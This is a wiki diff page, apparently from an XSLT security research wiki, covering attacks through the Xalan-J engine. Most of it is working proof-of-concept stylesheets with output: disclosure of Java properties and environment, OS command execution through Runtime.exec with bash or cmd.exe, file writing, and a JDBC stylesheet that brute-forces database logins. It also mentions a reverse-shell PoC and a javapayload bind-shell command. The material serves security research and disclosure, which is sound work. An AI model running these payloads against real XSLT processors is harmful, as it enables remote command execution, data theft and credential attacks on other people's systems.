Skip to Content

Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 72.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 09:27
Change comment: There is no comment for this version
To version Icon 13.1 Icon
edited by Nicolas Gregoire
on 2012/01/08 19:44
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -1,119 +5,97 @@
1 -{{toc/}}
2 -
3 -= Introduction =
4 -
5 5  [[Xalan-J>>http://xml.apache.org/xalan-j/||rel="__blank" title="Xalan-J Home Page"]] is a Java based XSLT engine by the Apache Project.
6 6  
7 -= Supported version =
8 8  
9 -1.0
4 +Supported XSLT version : 1.0
10 10  
11 -= Command line =
12 12  
13 -$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
7 +== Identification strings ==
14 14  
15 -__Note__ : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
9 +| xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
10 +| xsl:vendor|Apache Software Foundation
11 +| xsl:version|1.0
16 16  
17 -= Identification strings =
13 +== Special features ==
18 18  
19 -|=xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
20 -|=xsl:vendor|Apache Software Foundation
21 -|=xsl:version|1.0
22 -
23 -= Special features =
24 -
25 -* Java properties disclosure
26 -* Java environment disclosure
27 -* Java code execution
28 -* OS command execution
29 29  * File creation
16 +* Code execution
30 30  * JDBC connectivity
18 +* Java properties
19 +* CheckEnv()
31 31  
32 -= Java properties disclosure =
21 +== CheckEnv() ==
33 33  
34 -The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. In this example, the name of the Java properties is stored in a separate XML file ([[properties.xml>>attach:properties.xml]]). The XSLT code will, for each property, display its name and its value.
23 +The following code will display some information about the execution context :
35 35  
36 -|=Namespace|=Function|=PoC|=Sample output
37 -|http:~/~/www.w3.org/1999/XSL/Transform|system-property()|[[xalanj-java-properties.xsl>>attach:xalanj-java-properties.xsl]]|[[xalanj-java-properties-output.txt>>attach:xalanj-java-properties-output.txt]]
25 +[[checkenv.xsl>>attach:checkenv.xsl]]
38 38  
39 -= Java environment disclosure =
27 +TODO
40 40  
41 -The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (including available packages, paths, versions, ...).
29 +=== Code ===
42 42  
43 -|=Namespace|=Extension function|=PoC|=Sample output
44 -|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]]
31 +<?xml version="1.0"?>
32 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
33 + xmlns:xalan="http:~/~/xml.apache.org/xalan"
34 + exclude-result-prefixes="xalan"
35 + version="1.0">
45 45  
46 -= Java code execution =
47 47  
48 -The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
38 + <xsl:output indent="yes"/>
39 + <xsl:template match="/">
40 + (% style="text-align:center;color:blue" %)<xsl:copy-of select="xalan:checkEnvironment()"/>
49 49  
50 -|=Namespace|=Extension function|=PoC|=Sample output
51 -|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
52 -Wed Jan 11 22:45:07 CET 2012
53 53  
54 -= OS command execution =
43 + </xsl:template>
44 +\\</xsl:stylesheet>
55 55  
56 -Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class.
46 +=== Output ===
57 57  
58 -== Command without output ==
48 +<?xml version="1.0" encoding="UTF-8"?><checkEnvironmentExtension>
49 +<EnvironmentCheck version="$Revision$">
50 +<environment>
51 +<item key="version.DOM.draftlevel">2.0fd</item>
52 +<item key="java.class.path">:/usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/xalan25.jar:/usr/share/java/bsf-2.4.0.jar</item>
53 +<item key="version.JAXP">1.1 or higher</item>
54 +<item key="java.ext.dirs">/usr/lib/jvm/java-6-openjdk/jre/lib/ext:/usr/java/packages/lib/ext</item>
55 +<item key="version.xerces2">Xerces-J 2.9.1</item>
56 +<item key="version.xerces1">not-present</item>
57 +<item key="version.xalan2_2">Xalan Java 2.7.1</item>
58 +<item key="version.xalan1">not-present</item>
59 +<item key="version.ant">not-present</item>
60 +<item key="java.version">1.6.0_20</item>
61 +<item key="version.DOM">2.0</item>
62 +<item key="version.crimson">not-present</item>
63 +<item key="sun.boot.class.path">/usr/lib/jvm/java-6-openjdk/jre/lib/resources.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/rt.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/jsse.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/jce.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/charsets.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/netx.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/plugin.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/rhino.jar:/usr/lib/jvm/java-6-openjdk/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-openjdk/jre/classes</item>
64 +<foundJar desc="apis.jar-apparent.version" name="xml">xml-apis.jar present-unknown-version</foundJar>
65 +<foundJar desc="apis.jar-path" name="xml">/usr/share/java/xml-apis.jar</foundJar>
66 +<foundJar desc="apparent.version" name="xercesImpl.jar">xercesImpl.jar WARNING.present-unknown-version</foundJar>
67 +<foundJar desc="path" name="xercesImpl.jar">/usr/share/java/xercesImpl.jar</foundJar>
68 +<item key="version.SAX">2.0</item>
69 +<item key="version.xalan2x">Xalan Java 2.7.1</item>
70 +</environment>
71 +<status result="OK"/>
72 +</EnvironmentCheck>
73 +</checkEnvironmentExtension>
59 59  
60 -The attached PoC will not read the output of the executed command (because loops are hard in XSLT). But this is not a problem if a reverse-shell have already been started, isn't it ;-)
75 +== Java code execution ==
61 61  
62 -|=Namespace|=Extension functions|=PoC
63 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]]
77 +The following code will display the current date :
64 64  
65 -__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].
79 +TODO
66 66  
67 -== Reading stdout ==
81 +== Execution of external commands ==
68 68  
69 -As the output have an unknown number of lines, we must use a __loop__ construct like "while" ... which is not available in XSLT. This limitation is due to the functional programming paradigm but can be circumvented using templates and recursion. This way, we can also __update__ some variables, but the syntax is awful and error prone.
83 +The following code will execute the command "touch /tmp/hello" :
70 70  
71 -It's far more efficient to 1) write loops using non-standard elements like <loop:while> and <loop:update> 2) convert them in stylesheets using only templates and recursion. This conversion can be done with a tool like the [[XSLT Loop Compiler>>http://www2.informatik.hu-berlin.de/~~obecker/XSLT/loop-compiler/||rel="__blank"]] (which is itself in XSLT).
72 -
73 -The following PoC will fetch some commands from a XML file, execute them (with bash or cmd.exe depending on the detected OS), read the standard output and display it. The file with a "lxsl" extension uses the non-standard <loop:*> elements and is far more readable than the "xsl" one.
74 -
75 -|=Using non standards elements|=Using recursion and templates|=Commands to execute|=Output
76 -|[[xalanj-reading-stdout.lxsl>>attach:xalanj-reading-stdout.lxsl]]|[[xalanj-reading-stdout.xsl>>attach:xalanj-reading-stdout.xsl]]|[[unix_commands.xml>>attach:unix_commands.xml]]|[[xalanj-reading-stdout.txt>>attach:xalanj-reading-stdout.txt]]
77 -
78 -It is of course possible to include commands for multiples OS in one file and to execute only the relevant ones.
79 -
80 -= Pure Java reverse-shell =
81 -
82 -It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-(
83 -
84 -{{warning}}
85 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
86 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 -- JSh
87 -Check supported versions of Xalan !
88 -{{/warning}}
89 -
90 -= File creation =
91 -
92 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.
93 -
94 -|=Namespace|=Extension element|=Parameter|=PoC
95 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]]
96 -
97 -= JDBC connectivity =
98 -
99 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
100 -
101 -== Simple connection ==
102 -
103 -The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
104 -
105 -|=Namespace|=Extension function|=PoC
106 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
107 -
108 -== Credentials brute-forcing ==
109 -
110 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
111 -
112 -
113 -Here's the output when launched from the CLI :
114 -
115 -##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
116 -Username : [root] / Password : [] :
117 -Username : [root] / Password : [uberpasswd] :
118 -Username : [root] / Password : [cnam] : OK !!
119 -Username : [pma] / Password : [pma] : ##
85 +<?xml version="1.0"?>
86 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
87 + xmlns:j="http:~/~/xml.apache.org/xalan/java"
88 + exclude-result-prefixes="j"
89 + version="1.0">
90 + <xsl:template match="/">
91 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
92 + <xsl:variable name="a" select="j:split($c, ' = ')"/>
93 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
94 + <xsl:variable name="p" select="j:exec($r, $a )"/>
95 + No content at the moment ...
96 + </xsl:template>
97 +</xsl:stylesheet>
Icon properties.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.7 KB
Content
... ... @@ -1,73 +1,0 @@
1 -<properties>
2 -<property>awt.toolkit</property>
3 -<property>browser</property>
4 -<property>browser.vendor</property>
5 -<property>browser.version</property>
6 -<property>file.encoding</property>
7 -<property>file.encoding.pkg</property>
8 -<property>file.separator</property>
9 -<property>file.separator.applet</property>
10 -<property>http.agent</property>
11 -<property>java.awt.graphicsenv</property>
12 -<property>java.awt.printerjob</property>
13 -<property>java.class.path</property>
14 -<property>java.class.version</property>
15 -<property>java.class.version.applet</property>
16 -<property>java.endorsed.dirs</property>
17 -<property>java.ext.dirs</property>
18 -<property>java.home</property>
19 -<property>java.io.tmpdir</property>
20 -<property>java.library.path</property>
21 -<property>java.runtime.name</property>
22 -<property>java.runtime.version</property>
23 -<property>java.specification.name</property>
24 -<property>java.specification.vendor</property>
25 -<property>java.specification.version</property>
26 -<property>java.vendor</property>
27 -<property>java.vendor.applet</property>
28 -<property>java.vendor.url</property>
29 -<property>java.vendor.url.applet</property>
30 -<property>java.vendor.url.bug</property>
31 -<property>java.version</property>
32 -<property>java.version.applet</property>
33 -<property>java.vm.info</property>
34 -<property>java.vm.name</property>
35 -<property>java.vm.specification.name</property>
36 -<property>java.vm.specification.vendor</property>
37 -<property>java.vm.specification.version</property>
38 -<property>java.vm.vendor</property>
39 -<property>java.vm.version</property>
40 -<property>javax.accessibility.assistive_technologies</property>
41 -<property>line.separator</property>
42 -<property>line.separator.applet</property>
43 -<property>os.arch</property>
44 -<property>os.arch.applet</property>
45 -<property>os.name</property>
46 -<property>os.name.applet</property>
47 -<property>os.version</property>
48 -<property>os.version.applet</property>
49 -<property>package.restrict.definition.java</property>
50 -<property>package.restrict.definition.sun</property>
51 -<property>path.separator</property>
52 -<property>path.separator.applet</property>
53 -<property>sun.arch.data.model</property>
54 -<property>sun.boot.class.path</property>
55 -<property>sun.boot.library.path</property>
56 -<property>sun.cpu.endian</property>
57 -<property>sun.cpu.isalist</property>
58 -<property>sun.desktop</property>
59 -<property>sun.io.unicode.encoding</property>
60 -<property>sun.java.launcher</property>
61 -<property>sun.jnu.encoding</property>
62 -<property>sun.management.compiler</property>
63 -<property>sun.os.patch.level</property>
64 -<property>user.country</property>
65 -<property>user.dir</property>
66 -<property>user.home</property>
67 -<property>user.language</property>
68 -<property>user.name</property>
69 -<property>user.timezone</property>
70 -<property>user.variant</property>
71 -<property>user.zoneinfo.dir</property>
72 -</properties>
73 -
Icon unixcommands.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -159 bytes
Content
... ... @@ -1,8 +1,0 @@
1 -<data>
2 -<command>id</command>
3 -<command>date</command>
4 -<command>ifconfig lo</command>
5 -<command>tree /var/cache/apt</command>
6 -<command>uname -a</command>
7 -</data>
8 -
Icon xalanj-checkenv-output.txt
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.5 KB
Content
... ... @@ -1,31 +1,0 @@
1 -<?xml version="1.0" encoding="UTF-8"?><checkEnvironmentExtension>
2 - <EnvironmentCheck version="$Revision$">
3 - <environment>
4 - <item key="version.DOM.draftlevel">2.0fd</item>
5 - <item key="java.class.path">/usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar</item>
6 - <item key="version.JAXP">1.1 or higher</item>
7 - <item key="java.ext.dirs">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext</item>
8 - <item key="version.xerces2">Xerces-J 2.9.1</item>
9 - <item key="version.xerces1">not-present</item>
10 - <item key="version.xalan2_2">Xalan Java 2.7.1</item>
11 - <item key="version.xalan1">not-present</item>
12 - <item key="version.ant">not-present</item>
13 - <item key="java.version">1.6.0_26</item>
14 - <item key="version.DOM">2.0</item>
15 - <item key="version.crimson">not-present</item>
16 - <item key="sun.boot.class.path">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes</item>
17 - <foundJar desc="apis.jar-apparent.version" name="xml">xml-apis.jar present-unknown-version</foundJar>
18 - <foundJar desc="apis.jar-path" name="xml">/usr/share/java/xml-apis.jar</foundJar>
19 - <foundJar desc="apparent.version" name="xercesImpl.jar">xercesImpl.jar WARNING.present-unknown-version</foundJar>
20 - <foundJar desc="path" name="xercesImpl.jar">/usr/share/java/xercesImpl.jar</foundJar>
21 - <foundJar desc="apparent.version" name="serializer.jar">serializer.jar present-unknown-version</foundJar>
22 - <foundJar desc="path" name="serializer.jar">/usr/share/java/serializer.jar</foundJar>
23 - <foundJar desc="apparent.version" name="xsltc.jar">xsltc.jar present-unknown-version</foundJar>
24 - <foundJar desc="path" name="xsltc.jar">/usr/share/java/xsltc.jar</foundJar>
25 - <item key="version.SAX">2.0</item>
26 - <item key="version.xalan2x">Xalan Java 2.7.1</item>
27 - </environment>
28 - <status result="OK"/>
29 - </EnvironmentCheck>
30 -</checkEnvironmentExtension>
31 -
Icon xalanj-checkenv.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -310 bytes
Content
... ... @@ -1,11 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:xalan="http://xml.apache.org/xalan"
3 - version="1.0">
4 -
5 - <xsl:output method="xml" indent="yes" xalan:indent-amount="4"/>
6 - <xsl:template match="/">
7 - <xsl:copy-of select="xalan:checkEnvironment()"/>
8 - </xsl:template>
9 -
10 -</xsl:stylesheet>
11 -
Icon xalanj-java-date.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -409 bytes
Content
... ... @@ -1,11 +1,0 @@
1 -<xsl:stylesheet version="1.0"
2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
4 - exclude-result-prefixes="date">
5 - <xsl:output method="text"/>
6 - <xsl:template match="/">
7 - <xsl:variable name="dateObject" select="date:new()"/>
8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
9 - </xsl:template>
10 -</xsl:stylesheet>
11 -
Icon xalanj-java-properties-output.txt
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.8 KB
Content
... ... @@ -1,73 +1,0 @@
1 -<?xml version="1.0" encoding="UTF-8"?>
2 -awt.toolkit:
3 -browser:
4 -browser.vendor:
5 -browser.version:
6 -file.encoding: UTF-8
7 -file.encoding.pkg: sun.io
8 -file.separator: /
9 -file.separator.applet:
10 -http.agent:
11 -java.awt.graphicsenv: sun.awt.X11GraphicsEnvironment
12 -java.awt.printerjob: sun.print.PSPrinterJob
13 -java.class.path: /usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar
14 -java.class.version: 50.0
15 -java.class.version.applet:
16 -java.endorsed.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/endorsed
17 -java.ext.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext
18 -java.home: /usr/lib/jvm/java-6-sun-1.6.0.26/jre
19 -java.io.tmpdir: /tmp
20 -java.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386/client:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib
21 -java.runtime.name: Java(TM) SE Runtime Environment
22 -java.runtime.version: 1.6.0_26-b03
23 -java.specification.name: Java Platform API Specification
24 -java.specification.vendor: Sun Microsystems Inc.
25 -java.specification.version: 1.6
26 -java.vendor: Sun Microsystems Inc.
27 -java.vendor.applet:
28 -java.vendor.url: http://java.sun.com/
29 -java.vendor.url.applet:
30 -java.vendor.url.bug: http://java.sun.com/cgi-bin/bugreport.cgi
31 -java.version: 1.6.0_26
32 -java.version.applet:
33 -java.vm.info: mixed mode, sharing
34 -java.vm.name: Java HotSpot(TM) Client VM
35 -java.vm.specification.name: Java Virtual Machine Specification
36 -java.vm.specification.vendor: Sun Microsystems Inc.
37 -java.vm.specification.version: 1.0
38 -java.vm.vendor: Sun Microsystems Inc.
39 -java.vm.version: 20.1-b02
40 -javax.accessibility.assistive_technologies:
41 -line.separator:
42 -
43 -line.separator.applet:
44 -os.arch: i386
45 -os.arch.applet:
46 -os.name: Linux
47 -os.name.applet:
48 -os.version: 2.6.32-37-generic
49 -os.version.applet:
50 -package.restrict.definition.java:
51 -package.restrict.definition.sun:
52 -path.separator: :
53 -path.separator.applet:
54 -sun.arch.data.model: 32
55 -sun.boot.class.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes
56 -sun.boot.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386
57 -sun.cpu.endian: little
58 -sun.cpu.isalist:
59 -sun.desktop: gnome
60 -sun.io.unicode.encoding: UnicodeLittle
61 -sun.java.launcher: SUN_STANDARD
62 -sun.jnu.encoding: UTF-8
63 -sun.management.compiler: HotSpot Client Compiler
64 -sun.os.patch.level: unknown
65 -user.country: FR
66 -user.dir: /home/bob/foobar
67 -user.home: /home/bob
68 -user.language: fr
69 -user.name: bob
70 -user.timezone:
71 -user.variant:
72 -user.zoneinfo.dir:
73 -
Icon xalanj-java-properties.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -276 bytes
Content
... ... @@ -1,7 +1,0 @@
1 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" >
2 - <xsl:template match="//property">
3 - <xsl:variable name="p" select="text()"/>
4 - <xsl:value-of select="$p"/>: <xsl:value-of select="system-property($p)"/>
5 - </xsl:template>
6 -</xsl:stylesheet>
7 -
Icon xalanj-jdbc-bruteforce.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -775 bytes
Content
... ... @@ -1,35 +1,0 @@
1 -<data>
2 - <foobar>
3 - <DBINFO>
4 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
5 - <dburl>jdbc:mysql://localhost/</dburl>
6 - <user>root</user>
7 - <password></password>
8 - </DBINFO>
9 - </foobar>
10 - <foobar>
11 - <DBINFO>
12 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
13 - <dburl>jdbc:mysql://localhost/</dburl>
14 - <user>root</user>
15 - <password>uberpasswd</password>
16 - </DBINFO>
17 - </foobar>
18 - <foobar>
19 - <DBINFO>
20 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
21 - <dburl>jdbc:mysql://localhost/</dburl>
22 - <user>root</user>
23 - <password>cnam</password>
24 - </DBINFO>
25 - </foobar>
26 - <foobar>
27 - <DBINFO>
28 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
29 - <dburl>jdbc:mysql://localhost/</dburl>
30 - <user>pma</user>
31 - <password>pma</password>
32 - </DBINFO>
33 - </foobar>
34 -</data>
35 -
Icon xalanj-jdbc-bruteforce.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -979 bytes
Content
... ... @@ -1,29 +1,0 @@
1 -<?xml version="1.0"?>
2 -
3 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 - version="1.0"
5 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
6 - extension-element-prefixes="sql">
7 -
8 -<xsl:output method="text" indent="yes"/>
9 -<xsl:variable name="query">SELECT "OK !!"</xsl:variable>
10 -
11 -<xsl:template match="//data">
12 - <xsl:for-each select="foobar">
13 -
14 - <xsl:variable name="cinfo" select="DBINFO"/>
15 - <xsl:variable name="user" select="DBINFO/user/text()"/>
16 - <xsl:variable name="passwd" select="DBINFO/password/text()"/>
17 -
18 - <xsl:variable name="db" select="sql:new($cinfo)"/>
19 - <xsl:variable name="data" select='sql:query($db, $query)'/>
20 -
21 - <xsl:copy-of select="concat('Username : [', $user, '] / ')" />
22 - <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" />
23 - <xsl:copy-of select="$data" /><xsl:copy-of select="'&#x0A;'" />
24 -
25 - </xsl:for-each>
26 -</xsl:template>
27 -
28 -</xsl:stylesheet>
29 -
Icon xalanj-jdbc-query.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -848 bytes
Content
... ... @@ -1,22 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
3 - extension-element-prefixes="sql"
4 - version="1.0">
5 -
6 -<xsl:output method="xml" indent="yes"/>
7 -
8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/>
9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/>
10 -<xsl:param name="user" select="'root'"/>
11 -<xsl:param name="pass" select="'14m31337'"/>
12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/>
13 -
14 -<xsl:template match="/">
15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/>
16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/>
17 - <xsl:copy-of select="$table" />
18 - <xsl:value-of select="sql:close($db)"/>
19 -</xsl:template>
20 -
21 -</xsl:stylesheet>
22 -
Icon xalanj-reading-stdout.lxsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -3.5 KB
Content
... ... @@ -1,93 +1,0 @@
1 -<?xml version="1.0"?>
2 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 - xmlns:j="http://xml.apache.org/xalan/java"
4 - xmlns:bufferedreader="xalan://java.io.BufferedReader"
5 - xmlns:inputstreamreader="xalan://java.io.InputStreamReader"
6 - xmlns:process="xalan://java.lang.Process"
7 - xmlns:runtime="xalan://java.lang.Runtime"
8 - xmlns:loop="http://informatik.hu-berlin.de/loop"
9 - exclude-result-prefixes="j"
10 - version="1.0">
11 -
12 - <!-- Configure the output -->
13 - <xsl:output method="text" />
14 - <xsl:strip-space elements="*" />
15 -
16 - <!-- Some variables -->
17 - <xsl:variable name="rt" select="runtime:getRuntime()"/>
18 - <xsl:variable name="os" select="j:java.lang.System.getProperty('os.name')"/>
19 - <xsl:variable name="unix_shell" select="'/bin/bash'"/>
20 - <xsl:variable name="unix_option" select="'-c'"/>
21 - <xsl:variable name="win_shell" select="'cmd.exe'"/>
22 - <xsl:variable name="win_option" select="'/C'"/>
23 - <xsl:variable name="delim" select="' -=DELIM=- '"/>
24 -
25 - <!-- The main template -->
26 - <xsl:template match="//command">
27 -
28 - <!-- Fetch from the XML file -->
29 - <xsl:variable name="command" select="text()"/>
30 -
31 - <!-- Check the underlying OS -->
32 - <xsl:variable name="tmp">
33 - <xsl:choose>
34 - <xsl:when test="contains($os, 'indows')">
35 - <xsl:value-of select="concat($win_shell, $delim, $win_option, $delim, $command)"/>
36 - </xsl:when>
37 - <xsl:otherwise>
38 - <xsl:value-of select="concat($unix_shell, $delim, $unix_option, $delim, $command)"/>
39 - </xsl:otherwise>
40 - </xsl:choose>
41 - </xsl:variable>
42 - <xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
43 -
44 - <!-- Create the process and its streams -->
45 - <xsl:variable name="array" select="j:split($cmd, $delim)"/>
46 - <xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
47 - <xsl:variable name="inputstream" select="process:getInputStream($proc)"/>
48 - <xsl:variable name="inputstreamreader" select="inputstreamreader:new($inputstream)"/>
49 - <xsl:variable name="bufferedreader" select="bufferedreader:new($inputstreamreader)"/>
50 -
51 - <!-- Print the detected OS -->
52 - <xsl:text>OS [</xsl:text>
53 - <xsl:value-of select="$os"/>
54 - <xsl:text>] ...&#xA;</xsl:text>
55 -
56 - <!-- Print the executed command -->
57 - <xsl:text>Executing [</xsl:text>
58 - <xsl:value-of select="$command"/>
59 - <xsl:text>] ...&#xA;</xsl:text>
60 -
61 - <!-- Prepare the loop -->
62 - <xsl:variable name="cond" select="1" />
63 - <xsl:variable name="result" select="N/A" />
64 - <loop:while test="$cond">
65 -
66 - <!-- Read a line -->
67 - <loop:do>
68 - <xsl:variable name="line" select="bufferedreader:readLine($bufferedreader)"/>
69 - <xsl:variable name="class" select="j:toString(j:getClass($line))"/>
70 - <xsl:variable name="continue" select="j:equals($class, 'class java.lang.String')"/>
71 - <!-- Debug code
72 - <xsl:text>Line: </xsl:text><xsl:value-of select="$line"/> <xsl:text>&#xA;</xsl:text>
73 - <xsl:text>Loop : </xsl:text><xsl:value-of select="$continue"/> <xsl:text>&#xA;</xsl:text>
74 - -->
75 - </loop:do>
76 -
77 - <!-- Print the result -->
78 - <loop:last>
79 - <!-- Debug code
80 - <xsl:text>Result:</xsl:text>
81 - <xsl:text>&#xA;</xsl:text>
82 - -->
83 - <xsl:value-of select="$result"/>
84 - </loop:last>
85 -
86 - <!-- Update the global variables -->
87 - <loop:update name="cond" select="$continue"/>
88 - <loop:update name="result" select="concat($result, $line, '&#x0A;')"/>
89 -
90 - </loop:while>
91 - </xsl:template>
92 -</xsl:stylesheet>
93 -
Icon xalanj-reading-stdout.txt
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
